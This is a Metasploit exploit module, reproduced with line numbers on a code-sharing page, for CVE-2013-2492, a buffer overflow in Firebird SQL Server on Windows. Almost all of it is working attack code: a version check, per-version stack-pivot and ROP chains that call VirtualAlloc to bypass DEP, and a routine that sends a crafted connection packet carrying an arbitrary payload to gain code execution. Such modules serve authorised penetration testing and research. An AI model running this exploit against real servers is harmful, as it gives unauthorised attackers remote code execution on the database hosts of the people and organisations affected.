Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8
  include Msf::Exploit::Remote::Tcp
9

10
  def initialize
11
    super(
12
      'Name'           => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
13
      'Description'    => %q{
14
          This module exploits a vulnerability in Firebird SQL Server.  A specially
15
        crafted packet can be sent which will overwrite a pointer allowing the attacker to
16
        control where data is read from.  Shortly, following the controlled read, the
17
        pointer is called resulting in code execution.
18

19
        The vulnerability exists with a group number extracted from the CNCT information,
20
        which is sent by the client, and whose size is not properly checked.
21

22
        This module uses an existing call to memcpy, just prior to the vulnerable code,
23
        which allows a small amount of data to be written to the stack. A two-phases
24
        stack pivot allows to execute the ROP chain which ultimately is used to execute
25
        VirtualAlloc and bypass DEP.
26
      },
27
      'Author'      => 'Spencer McIntyre',
28
      'Arch'        => ARCH_X86,
29
      'Platform'    => 'win',
30
      'References'  =>
31
        [
32
          [ 'CVE', '2013-2492' ],
33
          [ 'OSVDB', '91044' ]
34
        ],
35
      'DefaultOptions' =>
36
        {
37
          'EXITFUNC' => 'seh'
38
        },
39
      'Payload'      =>
40
        {
41
          # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
42
          'Prepend'  => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
43
          'Space'    => 400,
44
          'BadChars' => "\x00\x0a\x0d"
45
        },
46
      'Targets'     =>
47
        [
48
          # pivots are pointers to stack pivots of size 0x28
49
          [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
50
          [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
51
          [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
52
          [ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
53
          [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
54
        ],
55
      'DefaultTarget'  => 0,
56
      'Privileged'     => true,
57
      'DisclosureDate' => 'Jan 31 2013',
58
      'Notes'          =>
59
        {
60
          'Stability' => [ CRASH_SERVICE_RESTARTS ],
61
        },
62
    )
63

64
    register_options([Opt::RPORT(3050)])
65
  end
66

67
  def check
68
    begin
69
      connect
70
    rescue
71
      vprint_error("Unable to get a connection")
72
      return Exploit::CheckCode::Unknown
73
    end
74

75
    filename =  "C:\\#{rand_text_alpha(12)}.fdb"
76
    username = rand_text_alpha(7)
77

78
    check_data =  ""
79
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
80
    check_data << "\x00\x00\x00\x13"
81
    check_data << filename
82
    check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"
83
    check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"
84
    check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
85
    check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
86
    check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
87
    check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
88
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
89
    check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
90
    check_data << "\x00\x00\x00\x08"
91

92
    sock.put(check_data)
93
    data = sock.recv(16)
94
    disconnect
95

96
    opcode = data.unpack("N*")[0]
97
    if opcode == 3 # Accept
98
      return Exploit::CheckCode::Detected
99
    end
100

101
    return Exploit::CheckCode::Safe
102
  end
103

104
  def stack_pivot_rop_chain
105
    case target.name
106
    when 'Windows FB 2.5.2.26539'
107
      rop_chain = [
108
        0x005e1ea4,		# MOV EAX,EDI # RETN [fbserver.exe]
109
        0x0059ffeb,		# POP EBP # RETN [fbserver.exe]
110
        0x0000153c,		# 0x0000153c-> ebp
111
        0x005d261f,		# ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
112
        0x0059fe1f,		# MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
113
      ].pack("V*")
114
    when 'Windows FB 2.5.1.26351'
115
      rop_chain = [
116
        0x005e1ab8,		# MOV EAX,EDI # RETN [fbserver.exe]
117
        0x0059650b,		# POP EBP # RETN [fbserver.exe]
118
        0x0000153c,		# 0x0000153c-> ebp
119
        0x005cf6ff,		# ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
120
        0x0059a3db,		# MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
121
      ].pack("V*")
122
    when 'Windows FB 2.1.5.18496'
123
      rop_chain = [
124
        0x0055b844,		# MOV EAX,EDI # RETN [fbserver.exe]
125
        0x4a86ee77,		# POP ECX # RETN [icuuc30.dll]
126
        0x000001c0,		# 0x000001c0-> ecx
127
        0x005aee63,		# ADD EAX,ECX # RETN [fbserver.exe]
128
        0x4a82d326,		# XCHG EAX,ESP # RETN [icuuc30.dll]
129
      ].pack("V*")
130
    when 'Windows FB 2.1.4.18393'
131
      rop_chain = [
132
        0x0042264c,		# MOV EAX,EDI # RETN [fbserver.exe]
133
        0x4a8026e1,		# POP ECX # RETN [icuuc30.dll]
134
        0x000001c0,		# 0x000001c0-> ecx
135
        0x004c5499,		# ADD EAX,ECX # RETN [fbserver.exe]
136
        0x4a847664,		# XCHG EAX,ESP # RETN [icuuc30.dll]
137
      ].pack("V*")
138
    when 'Debug'
139
      rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
140
    end
141
    return rop_chain
142
  end
143

144
  def final_rop_chain
145
    # all rop chains in here created with mona.py, thanks corelan!
146
    case target.name
147
    when 'Windows FB 2.5.2.26539'
148
      rop_chain = [
149
        0x4a831344,	# POP ECX # RETN [icuuc30.dll]
150
        0x0065f16c,	# ptr to &VirtualAlloc() [IAT fbserver.exe]
151
        0x005989f0,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
152
        0x004666a6,	# XCHG EAX,ESI # RETN [fbserver.exe]
153
        0x00431905,	# POP EBP # RETN [fbserver.exe]
154
        0x00401932,	# & push esp # ret  [fbserver.exe]
155
        0x4a844ac0,	# POP EBX # RETN [icuuc30.dll]
156
        0x00001000,	# 0x00001000-> ebx
157
        0x4a85bfee,	# POP EDX # RETN [icuuc30.dll]
158
        0x00001000,	# 0x00001000-> edx
159
        0x005dae9e,	# POP ECX # RETN [fbserver.exe]
160
        0x00000040,	# 0x00000040-> ecx
161
        0x0057a822,	# POP EDI # RETN [fbserver.exe]
162
        0x005b0384,	# RETN (ROP NOP) [fbserver.exe]
163
        0x0046f8c3,	# POP EAX # RETN [fbserver.exe]
164
        0x90909090,	# nop
165
        0x00586002,	# PUSHAD # RETN [fbserver.exe]
166
      ].pack("V*")
167
    when 'Windows FB 2.5.1.26351'
168
      rop_chain = [
169
        0x00656472,	# POP ECX # RETN [fbserver.exe]
170
        0x0065b16c,	# ptr to &VirtualAlloc() [IAT fbserver.exe]
171
        0x00410940,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
172
        0x0063be76,	# XCHG EAX,ESI # RETN [fbserver.exe]
173
        0x0041d1ae,	# POP EBP # RETN [fbserver.exe]
174
        0x0040917f,	# & call esp [fbserver.exe]
175
        0x4a8589c0,	# POP EBX # RETN [icuuc30.dll]
176
        0x00001000,	# 0x00001000-> ebx
177
        0x4a864cc3,	# POP EDX # RETN [icuuc30.dll]
178
        0x00001000,	# 0x00001000-> edx
179
        0x0064ef59,	# POP ECX # RETN [fbserver.exe]
180
        0x00000040,	# 0x00000040-> ecx
181
        0x005979fa,	# POP EDI # RETN [fbserver.exe]
182
        0x00424a50,	# RETN (ROP NOP) [fbserver.exe]
183
        0x4a86052d,	# POP EAX # RETN [icuuc30.dll]
184
        0x90909090,	# nop
185
        0x005835f2,	# PUSHAD # RETN [fbserver.exe]
186
      ].pack("V*")
187
    when 'Windows FB 2.1.5.18496'
188
      rop_chain = [
189
        0x005763d5,	# POP EAX # RETN [fbserver.exe]
190
        0x005ce120,	# ptr to &VirtualAlloc() [IAT fbserver.exe]
191
        0x004865a4,	# MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
192
        0x004cf4f6,	# XCHG EAX,ESI # RETN [fbserver.exe]
193
        0x004e695a,	# POP EBP # RETN [fbserver.exe]
194
        0x004d9e6d,	# & jmp esp [fbserver.exe]
195
        0x4a828650,	# POP EBX # RETN [icuuc30.dll]
196
        0x00001000,	# 0x00001000-> ebx
197
        0x4a85bfee,	# POP EDX # RETN [icuuc30.dll]
198
        0x00001000,	# 0x00001000-> edx
199
        0x00590328,	# POP ECX # RETN [fbserver.exe]
200
        0x00000040,	# 0x00000040-> ecx
201
        0x4a8573a1,	# POP EDI # RETN [icuuc30.dll]
202
        0x0042ba8c,	# RETN (ROP NOP) [fbserver.exe]
203
        0x00577605,	# POP EAX # RETN [fbserver.exe]
204
        0x90909090,	# nop
205
        0x004530ce,	# PUSHAD # RETN [fbserver.exe]
206
      ].pack("V*")
207
    when 'Windows FB 2.1.4.18393'
208
      rop_chain = [
209
        0x4a843429,	# POP ECX # RETN [icuuc30.dll]
210
        0x005ca120,	# ptr to &VirtualAlloc() [IAT fbserver.exe]
211
        0x0055a870,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
212
        0x004cecf6,	# XCHG EAX,ESI # RETN [fbserver.exe]
213
        0x004279c0,	# POP EBP # RETN [fbserver.exe]
214
        0x0040747d,	# & call esp [fbserver.exe]
215
        0x004ebef1,	# POP EBX # RETN [fbserver.exe]
216
        0x00001000,	# 0x00001000-> ebx
217
        0x4a864c5e,	# POP EDX # RETN [icuuc30.dll]
218
        0x00001000,	# 0x00001000-> edx
219
        0x004eaa3b,	# POP ECX # RETN [fbserver.exe]
220
        0x00000040,	# 0x00000040-> ecx
221
        0x4a8330a2,	# POP EDI # RETN [icuuc30.dll]
222
        0x00423b82,	# RETN (ROP NOP) [fbserver.exe]
223
        0x0046b5b1,	# POP EAX # RETN [fbserver.exe]
224
        0x90909090,	# nop
225
        0x004c8cfc,	# PUSHAD # RETN [fbserver.exe]
226
      ].pack("V*")
227
    when 'Debug'
228
      rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
229
    end
230
    return rop_chain
231
  end
232

233
  def exploit
234
    connect
235

236
    rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")
237

238
    # this data gets written to the stack via memcpy, no more than 32 bytes can be written
239
    overwrite_and_rop_chain =  [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot
240
    overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]
241
    overwrite_and_rop_chain << stack_pivot_rop_chain
242

243
    filename  =  "C:\\#{rand_text_alpha(13)}.fdb"
244
    evil_data =  "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
245
    evil_data << "\x00\x00\x00\x14"
246
    evil_data << filename
247
    evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"
248
    evil_data << "\x05\x20"
249
    evil_data << overwrite_and_rop_chain
250
    evil_data << "\x15\x6c\x6f\x63\x61\x6c"
251
    evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
252
    evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
253
    evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
254
    evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
255
    evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
256
    evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
257
    evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"
258
    evil_data << rop_nop_sled
259
    evil_data << final_rop_chain
260
    evil_data << payload.encoded
261

262
    print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")
263
    sock.put(evil_data)
264

265
    disconnect
266
  end
267
end
268

269